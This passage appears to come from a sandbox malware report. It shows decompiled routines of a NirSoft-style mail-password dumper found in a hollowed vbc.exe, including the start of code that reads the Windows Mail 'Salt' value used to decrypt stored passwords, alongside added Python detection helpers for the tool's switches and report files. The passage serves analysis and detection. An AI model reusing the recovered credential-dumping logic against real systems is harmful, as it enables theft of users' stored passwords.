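    _row(FONT_FORMAT % (b'FF0000', b'Password'), b'hunter2'),
]) + _table([
    _row(b'Name', b'Old IMAP'),
    _row(b'Email', b'old@example.com'),
    _row(b'Password', b'&nbsp;'),  # empty field exactly as the routine renders it
])

# Constructed stand-in for the 0x400000 image: PE headers, then a string table.
SAMPLE_DUMP = (
    b'MZ' + b'\x00' * 62 + b'PE\x00\x00' + b'\x00' * 58
    + TABLE_OPEN + b'\x00' + ROW_FORMAT + b'\x00' + FONT_FORMAT + b'\x00'
    + TABLE_CLOSE + b'\x00' + b'\x00'.join(CFG_KEYS) + b'\x00'
)

if __name__ == '__main__':
    print('export routine present:', looks_like_export_routine(scan_indicators(SAMPLE_DUMP)))
    for item in parse_vertical_report(SAMPLE_REPORT):
        print(item)
```

The indicator hits identify the NirSoft component, not the dropper: the same strings are present in a legitimately installed copy of the tool. What makes them malicious in this report is the context, an image at 0x400000 inside a hollowed vbc.exe (snapshot hcaresult_15_2_400000_vbc.jbxd), so correlate scan hits with process ancestry rather than treating the strings alone as a verdict.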
Instruction addresses for E00409482: 0x00409482 - 0x0040960b (per-line address column omitted)
                                                                                                                                                    0x0040960f
                                                                                                                                                    0x0040961c
                                                                                                                                                    0x00409622
                                                                                                                                                    0x0040962c
                                                                                                                                                    0x00409650
                                                                                                                                                    0x0040965b
                                                                                                                                                    0x00409660
                                                                                                                                                    0x00409663
                                                                                                                                                    0x0040966c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00409544
                                                                                                                                                    0x00409544
                                                                                                                                                    0x00409546
                                                                                                                                                    0x00409672
                                                                                                                                                    0x0040967a
                                                                                                                                                    0x00409692

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004094A2
                                                                                                                                                    • memset.MSVCRT ref: 004094C5
                                                                                                                                                    • memset.MSVCRT ref: 004094DB
                                                                                                                                                    • memset.MSVCRT ref: 004094EB
                                                                                                                                                    • sprintf.MSVCRT ref: 0040951F
                                                                                                                                                    • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                                                                                                    • sprintf.MSVCRT ref: 004095ED
                                                                                                                                                    • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                                                                                                      • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00409601
                                                                                                                                                    • sprintf.MSVCRT ref: 00409650
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                    • API String ID: 2822972341-601624466
                                                                                                                                                    • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                                                                                    • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                                                                                                                    • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                                                                                    • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00409EC4(void* __eax) {
                                                                                                                                                    				void* _v36;
                                                                                                                                                    				long _v40;
                                                                                                                                                    				void* _v44;
                                                                                                                                                    				void* _v56;
                                                                                                                                                    				long _t21;
                                                                                                                                                    				void* _t24;
                                                                                                                                                    				long _t26;
                                                                                                                                                    				long _t34;
                                                                                                                                                    				long _t37;
                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                    				void* _t42;
                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                    				void* _t47;
                                                                                                                                                    
                                                                                                                                                    				_t40 = ImageList_Create;
                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                    				_t44 = __imp__ImageList_SetImageCount;
                                                                                                                                                    				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                                                                                                                                    					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                    					 *(_t47 + 0x18c) = _t37;
                                                                                                                                                    					 *_t44(_t37, 1);
                                                                                                                                                    					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
                                                                                                                                                    				}
                                                                                                                                                    				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                                                                                                                    					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                                                                                                                    					 *(_t47 + 0x190) = _t34;
                                                                                                                                                    					 *_t44(_t34, 1);
                                                                                                                                                    					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                                                                                                                    				}
                                                                                                                                                    				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                    				 *(_t47 + 0x188) = _t21;
                                                                                                                                                    				 *_t44(_t21, 2);
                                                                                                                                                    				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                    				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                    				_t42 = _t24;
                                                                                                                                                    				 *_t44( *(_t47 + 0x188), 0);
                                                                                                                                                    				_t26 = GetSysColor(0xf);
                                                                                                                                                    				_v40 = _t26;
                                                                                                                                                    				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                                                                                                                    				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                                                                                                                    				DeleteObject(_v56);
                                                                                                                                                    				DeleteObject(_t42);
                                                                                                                                                    				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                                                                                                    • SendMessageA.USER32 ref: 00409F11
                                                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                                                                                                    • SendMessageA.USER32 ref: 00409F46
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                                                                                                    • LoadImageA.USER32 ref: 00409F7B
                                                                                                                                                    • LoadImageA.USER32 ref: 00409F97
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00409FDB
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                                                                                                    • SendMessageA.USER32 ref: 00409FFC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3411798969-0
                                                                                                                                                    • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                                                                                    • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                                                                                                    • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                                                                                    • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 70%
			/* Command-line "save format" switch dispatcher of the embedded NirSoft-style
			   tool (the strings match the switches of the MailPassView / WebBrowserPassView
			   family flagged by the report's Yara rules).  L004115B2 is the _stricmp thunk
			   listed under APIs below; __eax carries the compare result, so zero means the
			   argument matched.  Each switch maps to a small integer format code that is
			   returned at the first match. */
			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										/* last case is computed rather than branched: the compare
										   result is folded into either 0 or 8 by the sbb/and/add idiom */
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;        /* /stabular */
										return _t5;
									}
								} else {
									_t6 = 7;          /* /scomma */
									return _t6;
								}
							} else {
								_t7 = 2;            /* /stab */
								return _t7;
							}
						} else {
							_t8 = 6;              /* /sxml */
							return _t8;
						}
					} else {
						_t9 = 5;                /* /sverhtml */
						return _t9;
					}
				} else {
					_t10 = 4;                 /* /shtml */
					return _t10;
				}
			}









Address column of the decompiler view (one address per statement), spanning 0x0040b842 to 0x0040b8d6.

                                                                                                                                                    APIs
                                                                                                                                                    • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                                                                                                    • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp
                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                    • API String ID: 2884411883-1959339147
                                                                                                                                                    • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                                                                                    • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                                                                                                    • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                                                                                    • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 92%
			/* Writes the header row of the tool's HTML report.  Roles inferred from the body:
			   _a4  - output context handed to E00405EFD (the write routine)
			   _a8  - column table, 8 bytes per entry: pointer to the name, then pointer to a width string
			   _a12 - column count
			   _a16 - row background colour, -1 = none (reused as the loop counter below)
			   _a20 - header text colour, -1 = none
			   E0040F071 renders a colour value into the _v1284 scratch buffer.
			   All output is assembled with sprintf/strcpy into fixed-size stack buffers. */
			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;        /* " width=\"%s\"" for the current column, or empty */
				void _v515;
				char _v516;        /* "</font>" or empty */
				void _v771;
				char _v772;        /* "<font color=\"%s\">" or empty */
				void _v1027;
				char _v1028;       /* " bgcolor=\"%s\"" or empty */
				char _v1284;       /* colour scratch buffer */
				char _v2308;       /* assembled line passed to the writer */
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				char* _t34;        /* used below but left undeclared by the decompiler */
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				/* the three optional attribute strings start out empty */
				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				/* table opening plus the header row; the <tr> is never closed here */
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405EFD(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;          /* points at the width string of the first column */
					_a16 = _t47;             /* parameter slot reused as the remaining-column counter */
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;         /* empty width string: no width attribute */
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						/* one <th> per column: width attr, optional <font>, name, optional </font>;
						   no closing </th> is written, the CRLF ends the cell */
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405EFD(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;     /* next column entry */
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}
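The two routines above describe a NirSoft-style credential-recovery tool from both ends: E0040B841 matches argv against the save-format switches (/shtml, /sverhtml, /sxml, /stab, /scomma, /stabular, /skeepass), and E0040F243 writes the HTML report header. The following triage helper is an added example, not part of the Joe Sandbox report or of the sample. It finds the NUL-terminated switch cluster in a memory dump or PE image, which fingerprints an embedded credential dumper even after process hollowing, and recognises the report file the tool writes by parsing the header E0040F243 produces. The sample blobs are constructed here; the UTF-16LE variant, the 4096-byte proximity window and the assumption that the header ends at the next `<tr` are the author's, not the report's.

```python
"""Triage helper for NirSoft-style credential dumpers embedded in malware.

Added example; not part of the Joe Sandbox report or of the analysed
sample.  Two checks modelled on the decompiled routines:
  * E0040B841 compares argv against NUL-terminated save-format switches,
    so those strings sit together in the tool's string table;
  * E0040F243 writes '<table border="1" cellpadding="5"><tr...>' and then
    one '<th...>name\\r\\n' line per column, without a closing </th>.
"""
import re
from typing import Dict, List, Optional

# Switches recovered from E0040B841 (ANSI in this sample).
SAVE_FORMAT_SWITCHES = (
    b"/shtml", b"/sverhtml", b"/sxml", b"/stab",
    b"/scomma", b"/stabular", b"/skeepass",
)

# Fixed prefix of the report header written by E0040F243.
HTML_REPORT_PREFIX = b'<table border="1" cellpadding="5"><tr'

# One header cell: optional <font ...>, then text up to '<' or CRLF.
TH_CELL = re.compile(rb"<th[^>]*>(?:<font[^>]*>)?([^<\r\n]*)")


def _find_all(data: bytes, needle: bytes) -> List[int]:
    """All offsets of needle in data."""
    offs, i = [], data.find(needle)
    while i >= 0:
        offs.append(i)
        i = data.find(needle, i + 1)
    return offs


def find_switches(data: bytes) -> Dict[str, List[int]]:
    """Map each switch to the offsets of its NUL-terminated occurrences.

    The terminator is required: a bare search for /stab would also fire
    inside /stabular.  A UTF-16LE form is tried as well (assumption: the
    sample is ANSI, but Unicode builds of such tools exist).
    """
    hits: Dict[str, List[int]] = {}
    for sw in SAVE_FORMAT_SWITCHES:
        ansi = sw + b"\x00"
        wide = sw.decode("ascii").encode("utf-16le") + b"\x00\x00"
        offs = sorted(_find_all(data, ansi) + _find_all(data, wide))
        if offs:
            hits[sw.decode("ascii")] = offs
    return hits


def switch_cluster(hits: Dict[str, List[int]],
                   min_distinct: int = 5, max_span: int = 4096) -> bool:
    """True if min_distinct different switches fall inside max_span bytes.

    Proximity separates a real string table from a stray '/sxml' in
    unrelated data; the 4096-byte window is an assumed value.
    """
    points = sorted((o, s) for s, offs in hits.items() for o in offs)
    lo = 0
    for hi in range(len(points)):
        while points[hi][0] - points[lo][0] > max_span:
            lo += 1
        if len({s for _, s in points[lo:hi + 1]}) >= min_distinct:
            return True
    return False


def parse_report_header(data: bytes) -> Optional[List[str]]:
    """Column names of a NirSoft-style HTML report, or None if absent.

    Cells are cut at CRLF because E0040F243 never emits </th>; the
    header is assumed to end where the first data row's '<tr' begins.
    """
    start = data.find(HTML_REPORT_PREFIX)
    if start < 0:
        return None
    end = data.find(b"<tr", start + len(HTML_REPORT_PREFIX))
    body = data[start:] if end < 0 else data[start:end]
    return [m.group(1).decode("latin-1").strip() for m in TH_CELL.finditer(body)]


# Constructed stand-ins for a string table and a dropped report; neither
# is taken from the sample.
FAKE_RDATA = b"\x90" * 64 + b"\x00".join(SAVE_FORMAT_SWITCHES) + b"\x00" + b"\x90" * 64
FAKE_REPORT = (
    b'<table border="1" cellpadding="5"><tr bgcolor="#E0E0E0">\r\n'
    b'<th width="120"><font color="#000000">Name</font>\r\n'
    b'<th>Password\r\n'
    b'<tr><td>user@example.invalid</td><td>hunter2</td></tr></table>'
)

if __name__ == "__main__":
    hits = find_switches(FAKE_RDATA)
    print("switches:", hits)
    print("cluster :", switch_cluster(hits))
    print("columns :", parse_report_header(FAKE_REPORT))
```

Run it over the raw bytes of the dump behind `hcaresult_15_2_400000_vbc.jbxd` (or any unpacked PE) to get the switch offsets, and over files written by the hollowed process to catch the report itself; the column names returned by `parse_report_header` tell you which credential store was dumped before you open the file in a browser.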
Instruction addresses (decompiler line gutter): 0x0040f25e, 0x0040f264, 0x0040f272, 0x0040f278, 0x0040f286, 0x0040f28c, 0x0040f291, 0x0040f298, 0x0040f2b6, 0x0040f2bb, 0x0040f2bb, 0x0040f2c2, 0x0040f2e0, 0x0040f2f1, 0x0040f2f6, 0x0040f2f6, 0x0040f30c, 0x0040f31b, 0x0040f320, 0x0040f323, 0x0040f328, 0x0040f332, 0x0040f335, 0x0040f338, 0x0040f341, 0x0040f347, 0x0040f34c, 0x0040f34e, 0x0040f353, 0x0040f36c, 0x0040f355, 0x0040f362, 0x0040f367, 0x0040f367, 0x0040f396, 0x0040f3a5, 0x0040f3aa, 0x0040f3ad, 0x0040f3b0, 0x0040f3b0, 0x0040f3b0, 0x00000000, 0x0040f3b5, 0x0040f3b9

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: sprintf$memset$strcpy
                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                    • API String ID: 898937289-3842416460
                                                                                                                                                    • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                                                                                    • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                                                                                                    • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                                                                                    • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040E0DA() {
                                                                                                                                                    				void* _t1;
                                                                                                                                                    				int _t2;
                                                                                                                                                    				struct HINSTANCE__* _t4;
                                                                                                                                                    
                                                                                                                                                    				if( *0x417518 != 0) {
                                                                                                                                                    					return _t1;
                                                                                                                                                    				}
                                                                                                                                                    				_t2 = LoadLibraryA("psapi.dll");
                                                                                                                                                    				_t4 = _t2;
                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                    					L10:
                                                                                                                                                    					return _t2;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
                                                                                                                                                    					 *0x416fec = _t2;
                                                                                                                                                    					if(_t2 != 0) {
                                                                                                                                                    						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                                                                                                                    						 *0x416fe4 = _t2;
                                                                                                                                                    						if(_t2 != 0) {
                                                                                                                                                    							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
                                                                                                                                                    							 *0x416fdc = _t2;
                                                                                                                                                    							if(_t2 != 0) {
                                                                                                                                                    								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                                                                                                                    								 *0x41710c = _t2;
                                                                                                                                                    								if(_t2 != 0) {
                                                                                                                                                    									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                                                                                                                    									 *0x416fe8 = _t2;
                                                                                                                                                    									if(_t2 != 0) {
                                                                                                                                                    										 *0x417518 = 1;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					if( *0x417518 == 0) {
                                                                                                                                                    						_t2 = FreeLibrary(_t4);
                                                                                                                                                    					}
                                                                                                                                                    					goto L10;
                                                                                                                                                    				}
                                                                                                                                                    			}
Instruction addresses (decompiler line gutter): 0x0040e0e1, 0x0040e171, 0x0040e171, 0x0040e0ed, 0x0040e0f3, 0x0040e0f7, 0x0040e170, 0x00000000, 0x0040e0f9, 0x0040e106, 0x0040e10a, 0x0040e10f, 0x0040e117, 0x0040e11b, 0x0040e120, 0x0040e128, 0x0040e12c, 0x0040e131, 0x0040e139, 0x0040e13d, 0x0040e142, 0x0040e14a, 0x0040e14e, 0x0040e153, 0x0040e155, 0x0040e155, 0x0040e153, 0x0040e142, 0x0040e131, 0x0040e120, 0x0040e167, 0x0040e16a, 0x0040e16a, 0x00000000, 0x0040e167

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                    • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                                                                                    • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                                                                                                    • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                                                                                    • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                    				char _v6;
                                                                                                                                                    				char _v7;
                                                                                                                                                    				char _v8;
                                                                                                                                                    				int _v12;
                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                    				void* _v20;
                                                                                                                                                    				short* _v24;
                                                                                                                                                    				unsigned int _v28;
                                                                                                                                                    				char* _v32;
                                                                                                                                                    				int _v36;
                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                    				signed int _v44;
                                                                                                                                                    				void _v299;
                                                                                                                                                    				char _v300;
                                                                                                                                                    				void _v555;
                                                                                                                                                    				char _v556;
                                                                                                                                                    				char _v1080;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				int _t56;
                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                    				char _t92;
                                                                                                                                                    				char* _t93;
                                                                                                                                                    				void* _t100;
                                                                                                                                                    				signed int _t102;
                                                                                                                                                    				signed int _t107;
                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                    				void* _t113;
                                                                                                                                                    
                                                                                                                                                    				_t113 = __eflags;
                                                                                                                                                    				_t100 = __edx;
                                                                                                                                                    				_t93 = __eax;
                                                                                                                                                    				E004046D7( &_v1080);
                                                                                                                                                    				if(E004047A0( &_v1080, _t113) != 0) {
                                                                                                                                                    					_t56 = strlen(_t93);
                                                                                                                                                    					asm("cdq");
                                                                                                                                                    					_t107 = _t56 - _t100 >> 1;
                                                                                                                                                    					_t2 = _t107 + 1; // 0x1
                                                                                                                                                    					_t58 = _t2;
                                                                                                                                                    					L004115D0();
                                                                                                                                                    					_t102 = 0;
                                                                                                                                                    					_t96 = _t58;
                                                                                                                                                    					_v16 = _t58;
                                                                                                                                                    					if(_t107 > 0) {
                                                                                                                                                    						do {
                                                                                                                                                    							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
                                                                                                                                                    							_v7 = _t93[1 + _t102 * 2];
                                                                                                                                                    							_v6 = 0;
                                                                                                                                                    							_t92 = E00406512( &_v8);
                                                                                                                                                    							_t96 = _v16;
                                                                                                                                                    							 *((char*)(_t102 + _v16)) = _t92;
                                                                                                                                                    							_t102 = _t102 + 1;
                                                                                                                                                    						} while (_t102 < _t107);
                                                                                                                                                    					}
                                                                                                                                                    					_v556 = 0;
                                                                                                                                                    					memset( &_v555, 0, 0xff);
                                                                                                                                                    					_v12 = 0;
                                                                                                                                                    					_v300 = 0;
                                                                                                                                                    					memset( &_v299, 0, 0xfe);
                                                                                                                                                    					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
                                                                                                                                                    					if(_t64 != 1) {
                                                                                                                                                    						__eflags = _t64 - 2;
                                                                                                                                                    						if(_t64 == 2) {
                                                                                                                                                    							_push("Software\\Microsoft\\Windows Live Mail");
                                                                                                                                                    							goto L7;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_push("Software\\Microsoft\\Windows Mail");
                                                                                                                                                    						L7:
                                                                                                                                                    						strcpy( &_v300, ??);
                                                                                                                                                    						_pop(_t96);
                                                                                                                                                    					}
                                                                                                                                                    					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
                                                                                                                                                    						_v12 = 0xff;
                                                                                                                                                    						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
